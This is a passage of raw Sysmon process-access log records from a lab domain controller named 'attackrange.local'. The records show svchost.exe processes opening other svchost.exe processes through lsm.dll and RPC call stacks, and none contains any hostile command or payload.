12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
